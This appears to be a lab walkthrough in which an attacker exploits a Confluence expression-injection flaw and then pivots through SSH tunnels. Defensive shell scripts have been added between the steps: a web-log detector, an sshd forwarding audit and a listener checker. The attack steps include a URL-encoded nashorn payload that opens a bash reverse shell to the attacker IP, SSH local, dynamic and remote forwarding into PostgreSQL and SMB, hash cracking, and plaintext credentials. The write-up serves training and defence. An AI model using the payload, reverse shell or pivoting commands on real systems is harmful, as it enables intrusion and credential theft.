Edge Device IP (CONFLUENCE01): 192.168.110.63
SSH server IP (PGDATABASE01): 10.4.110.215
Target IP (HRSHARES): 172.16.110.217
Provided Attacker IP: 192.168.45.209
Enumerating the edge device, we identify a remote code execution vulnerability we can exploit to obtain a reverse shell.
On the attacker machine:
1. Run nc -lnvp 4444
2. Run the following curl command to initiate the reverse shell (the URL is quoted so the shell does not interpret any of it):
curl -v 'http://192.168.110.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.209/4444%200%3E%261%27%29.start%28%29%22%29%7D/'
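The request above only does anything because the server evaluates the expression carried in the URL path, and that is exactly what a web-log check on the Confluence host should catch. The following is an added example, mine rather than code from the original notes or from any Confluence tooling, written in POSIX sh/awk: it percent-decodes the request path of each access-log line and alerts only when the decoded path contains `${` together with a Java class name used for code execution, so a harmless `${price}` in a query string is not reported. The combined-style log format, the three constructed sample entries, and the names urldecode and flag_ognl_requests are assumptions made for the example.

```shell
#!/bin/sh
# Constructed access-log sample (not captured from the lab). Line 2 carries a
# percent-encoded expression-injection payload; line 3 is a benign "${...}" lookalike.
SAMPLE_ACCESS_LOG=$(cat <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login.action HTTP/1.1" 200 4312
192.168.45.209 - - [01/Jan/2024:10:00:07 +0000] "GET /%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27id%27%29.start%28%29%22%29%7D/ HTTP/1.1" 302 0
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=%24%7Bprice%7D HTTP/1.1" 200 981
EOF
)

# awk helper shared by both functions below: urldecode(s) replaces every %XX
# escape with the byte it encodes (HEX is filled once in BEGIN).
AWK_URLDECODE='
function urldecode(s,    out) {
    out = ""
    while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
        out = out substr(s, 1, RSTART - 1) HEX[toupper(substr(s, RSTART + 1, 2))]
        s = substr(s, RSTART + RLENGTH)
    }
    return out s
}
BEGIN { for (i = 1; i < 256; i++) HEX[sprintf("%02X", i)] = sprintf("%c", i) }
'

# urldecode: percent-decode each line read from stdin.
urldecode() { awk "$AWK_URLDECODE"'{ print urldecode($0) }'; }

# flag_ognl_requests: read access-log lines on stdin, decode the request path, and
# print an ALERT line for paths that combine "${" with a code-execution class name.
# Decoding first matters because "${" arrives as %24%7B, which a plain grep misses.
flag_ognl_requests() {
    awk "$AWK_URLDECODE"'
    {
        n = split($0, q, "\"")             # q[2] is the quoted request line
        if (n < 3) next
        split(q[2], r, " ")                # r[1]=method r[2]=path r[3]=version
        path = urldecode(r[2])
        if (index(path, "${") && path ~ /ScriptEngineManager|ProcessBuilder|Runtime\.getRuntime/)
            printf "ALERT src=%s path=%s\n", $1, substr(path, 1, 60)
    }'
}

# Run the check over the constructed sample; only the second line is reported.
printf '%s\n' "$SAMPLE_ACCESS_LOG" | flag_ognl_requests
```

In production the same function reads the real log (`flag_ognl_requests < access.log`); the class-name list is the part to extend as new gadget patterns appear, while the decode step stays the same.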
In the reverse shell on the edge device:
1. Upgrade to a proper TTY using Python's pty module:
python3 -c 'import pty; pty.spawn("/bin/bash")'
2. Initiate the SSH connection to the SSH server, specifying the port we want to forward:
ssh -N -L 0.0.0.0:5454:10.4.110.215:5432 database_admin@10.4.110.215
This binds port 5454 on the edge device and forwards it, over the SSH session, to PostgreSQL on the SSH server at port 5432.
From the attacker machine, connect to the forwarded port:
psql -h 192.168.110.63 -p 5454 -U postgres
> Using discovered password: D@t4basePassw0rd!
Enumeration (inside psql):
1. \l
2. \c confluence
3. SELECT * FROM cwd_user;
4. Extract all usernames and their associated password hashes
5. Crack the hashes using hashcat (mode 12001, Atlassian)
Discovered credentials:
hr_admin: Welcome1234
rdp_admin: P@ssw0rd!
database_admin: sqlpass123
Back in the reverse shell on the edge device, forward SMB on HRSHARES through the same SSH server:
ssh -N -L 0.0.0.0:4545:172.16.110.217:445 database_admin@10.4.110.215
From the attacker machine:
smbclient -L //192.168.110.63 -p 4545 -U hr_admin --password Welcome1234
> Lists the shares; identify a scripts share
smbclient //192.168.110.63/scripts -p 4545 -U hr_admin --password Welcome1234
> Connects to the scripts share
Enumerating the share, we eventually find our flag:
ls -la
get provisioning.ps1
exit
cat provisioning.ps1
SSH Dynamic Port Forwarding
Run on the SSH client:
ssh -N -D 0.0.0.0:<Listening Port> <username>@<SSH server IP>
Because the destination socket is now chosen dynamically per connection (the listener is a SOCKS proxy rather than a fixed forward), we need proxychains to route traffic through it. After installing proxychains, configure the proxy in /etc/proxychains.conf by appending:
socks5 <proxy IP> <proxy Port>
Now, on the attacker machine, commands behave as if they were issued from the SSH server, as long as each command is prefixed with proxychains.
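Every forward used so far (the -L forwards to 5432 and 445, and the -D SOCKS listener here) is honoured by the sshd on the SSH server, so that host's sshd_config is where a defender switches the capability off. The following is an added example and not code from the original notes: a POSIX sh audit that reads the effective value of AllowTcpForwarding, GatewayPorts and PermitOpen the way sshd does (first uncommented occurrence wins; Match blocks are not evaluated) and reports whether a logged-in user could pivot through the host. The two sample config files and the function names effective_value, has_match_block and audit_sshd_forwarding are constructed for the example; point the audit at /etc/ssh/sshd_config for real use.

```shell
#!/bin/sh
# Constructed sample sshd_config files (not from the page). "open" leaves sshd at its
# defaults, so -L, -D and -R all work; "hardened" refuses every forwarding request.
OPEN_CFG="${TMPDIR:-/tmp}/sshd_config.open.$$"
HARDENED_CFG="${TMPDIR:-/tmp}/sshd_config.hardened.$$"
trap 'rm -f "$OPEN_CFG" "$HARDENED_CFG"' EXIT
cat > "$OPEN_CFG" <<'EOF'
# AllowTcpForwarding is commented out, so the sshd default (yes) applies
Port 22
#AllowTcpForwarding no
PermitRootLogin no
# a conditional block: tightens forwarding for one user only
Match User database_admin
    AllowTcpForwarding no
EOF
cat > "$HARDENED_CFG" <<'EOF'
Port 22
AllowTcpForwarding no
GatewayPorts no
PermitOpen none
EOF

# effective_value KEYWORD FILE
# sshd honours the FIRST uncommented occurrence of a keyword, so that one is printed.
# Matching is case-insensitive and accepts "Key value" and "Key=value" forms.
# Parsing stops at the first Match block: conditional overrides are not evaluated.
effective_value() {
    awk -v key="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        tolower($1) == "match"   { exit }
        {
            line = $0; sub(/^[ \t]+/, "", line)
            split(line, parts, "[ \t=]+")
            if (tolower(parts[1]) == key) { print parts[2]; exit }
        }' "$2"
}

# has_match_block FILE: exit 0 if the file contains an uncommented Match block.
has_match_block() {
    awk 'tolower($1) == "match" { found = 1 } END { exit !found }' "$1"
}

# audit_sshd_forwarding FILE
# Prints one line per forwarding control; returns 1 if a logged-in user could
# pivot through this host with ssh -L / -D / -R, 0 if every variant is refused.
audit_sshd_forwarding() {
    cfg="$1"; rc=0
    tcp=$(effective_value AllowTcpForwarding "$cfg"); tcp=${tcp:-yes}   # sshd default
    gw=$(effective_value GatewayPorts "$cfg");        gw=${gw:-no}      # sshd default
    po=$(effective_value PermitOpen "$cfg");          po=${po:-any}     # sshd default
    case "$tcp" in
        no)     echo "AllowTcpForwarding=no     OK: -L, -D and -R all refused" ;;
        local)  echo "AllowTcpForwarding=local  FINDING: -L/-D allowed (only -R refused)"; rc=1 ;;
        remote) echo "AllowTcpForwarding=remote FINDING: -R allowed (only -L/-D refused)"; rc=1 ;;
        *)      echo "AllowTcpForwarding=$tcp    FINDING: -L, -D and -R all allowed"; rc=1 ;;
    esac
    case "$gw" in
        no) echo "GatewayPorts=no         OK: -R listeners stay on loopback" ;;
        *)  echo "GatewayPorts=$gw        NOTE: -R listeners may bind non-loopback addresses" ;;
    esac
    case "$po" in
        any) echo "PermitOpen=any          NOTE: no destination limit on -L/-D" ;;
        *)   echo "PermitOpen=$po         OK: -L/-D destinations restricted" ;;
    esac
    if has_match_block "$cfg"; then
        echo "NOTE: Match block present; confirm with: sshd -T -C user=<name>,addr=<ip>"
    fi
    return $rc
}

# Audit both samples; the open one reports a finding, the hardened one is clean.
for f in "$OPEN_CFG" "$HARDENED_CFG"; do
    echo "== $f"
    if audit_sshd_forwarding "$f"; then echo "result: forwarding refused"; else echo "result: findings present"; fi
done
```

AllowTcpForwarding no is the one setting that refuses every variant on this page; GatewayPorts and PermitOpen only narrow what is left when forwarding stays enabled. Because a Match block can re-enable forwarding for a single user, the audit flags its presence and defers to `sshd -T`, which prints the configuration sshd actually applies for a given user and source address.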
SSH Remote Port Forwarding
Because inbound traffic is usually much more restricted than outbound traffic, we may not always be able to SSH directly into a network and port forward from there.
Instead we perform remote SSH port forwarding: by initiating an SSH connection from the SSH client to our attacker machine, we bind a listening port on the attacker machine to an internal address that is reachable from the SSH client.
With the listening port bound on the attacker machine, the SSH client is responsible for forwarding the traffic.
Ensure the SSH server (sshd) is running on the attacker machine.
Run on the SSH client:
ssh -N -R 0.0.0.0:<Listening Port>:<Target IP>:<Target Port> kali@<attacker IP>
Verify with: ss -ntplu
Commands can now be run against the attacker machine's localhost on <Listening Port>, and the traffic is redirected to the specified target IP and port.
SSH Remote Dynamic Port Forwarding
As with SSH Dynamic Port Forwarding, we add the dynamic aspect to SSH Remote Port Forwarding.
Ensure the SSH server (sshd) is running on the attacker machine.
Run on the SSH client:
ssh -N -R <attacker listening Port> kali@<attacker IP>
Verify with: ss -ntplu
As with SSH Dynamic Port Forwarding, we need proxychains to route traffic through the resulting SOCKS listener. After installing proxychains, configure the proxy in /etc/proxychains.conf.
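Both remote variants above end with `ss -ntplu`, and the same command is a defender's check: on the host where the ssh client runs it lists the listeners that -L and -D opened, and on any host whose sshd accepted a -R it shows a listener that sshd holds on a port other than its login port. In a remote forward the sshd is the attacker's own machine, so server-side hardening on the pivot does not help; inspecting listeners on the hosts you do control is the remaining check. The block below is an added example, not code from the original notes: it parses a constructed `ss -ntplu` sample (iproute2 column layout assumed), labels each SSH-created listener with its owner and whether it is bound to a wildcard address, and assumes the login port is 22 unless one is passed as an argument. The function names ssh_forward_listeners and exposed_forward_listeners are assumptions.

```shell
#!/bin/sh
# Constructed `ss -ntplu` output (not captured from the lab). Run for real with:
#   ss -ntplu | ssh_forward_listeners 22
SAMPLE_SS_OUTPUT=$(cat <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22           0.0.0.0:*         users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      128    0.0.0.0:4545         0.0.0.0:*         users:(("ssh",pid=2231,fd=5))
tcp   LISTEN 0      128    127.0.0.1:5454       0.0.0.0:*         users:(("ssh",pid=2231,fd=6))
tcp   LISTEN 0      4096   [::]:8080            [::]:*            users:(("sshd",pid=3002,fd=9))
tcp   LISTEN 0      511    0.0.0.0:80           0.0.0.0:*         users:(("nginx",pid=1010,fd=6))
udp   UNCONN 0      0      0.0.0.0:68           0.0.0.0:*         users:(("dhclient",pid=600,fd=6))
EOF
)

# ssh_forward_listeners [SSHD_PORT]
# Reads `ss -ntplu` output on stdin and prints one line per listener SSH created:
#   ssh  (the client) -> a -L or -D forward terminating on this host
#   sshd (the server) -> a -R forward: sshd listening on a port other than the
#                        one it serves logins on (SSHD_PORT, default 22)
# The last column says whether the socket answers on every interface (WILDCARD)
# or on one address (BOUND), which decides who on the network can use the tunnel.
ssh_forward_listeners() {
    awk -v sshport="${1:-22}" '
        $2 != "LISTEN" { next }                          # header, UDP, non-listening
        {
            split($7, q, "\"")                           # users:(("ssh",pid=2231,fd=5))
            proc = q[2]
            if (!match($7, /pid=[0-9]+/)) next
            pid  = substr($7, RSTART + 4, RLENGTH - 4)
            port = $5; sub(/.*:/, "", port)              # text after the last colon
            addr = $5; sub(/:[^:]*$/, "", addr)          # text before the last colon
            scope = (addr == "0.0.0.0" || addr == "[::]" || addr == "*") ? "WILDCARD" : "BOUND"
            if (proc == "ssh")
                printf "ssh-client-listener pid=%s %s %s\n", pid, $5, scope
            else if (proc == "sshd" && port != sshport)
                printf "sshd-remote-forward pid=%s %s %s\n", pid, $5, scope
        }'
}

# exposed_forward_listeners [SSHD_PORT]: only the listeners reachable from the network.
exposed_forward_listeners() { ssh_forward_listeners "$@" | awk '$NF == "WILDCARD"'; }

echo "SSH-created listeners in the sample:"
printf '%s\n' "$SAMPLE_SS_OUTPUT" | ssh_forward_listeners 22
echo "Reachable from the network:"
printf '%s\n' "$SAMPLE_SS_OUTPUT" | exposed_forward_listeners 22
```

On the sample this reports the two ssh-client listeners (the 0.0.0.0:4545 one wildcard-bound, the 127.0.0.1:5454 one not) and the sshd listener on [::]:8080, while the login socket on port 22, nginx and dhclient are ignored. A wildcard-bound ssh-client listener is the pattern the -L 0.0.0.0:... commands on this page produce, and is the one worth alerting on.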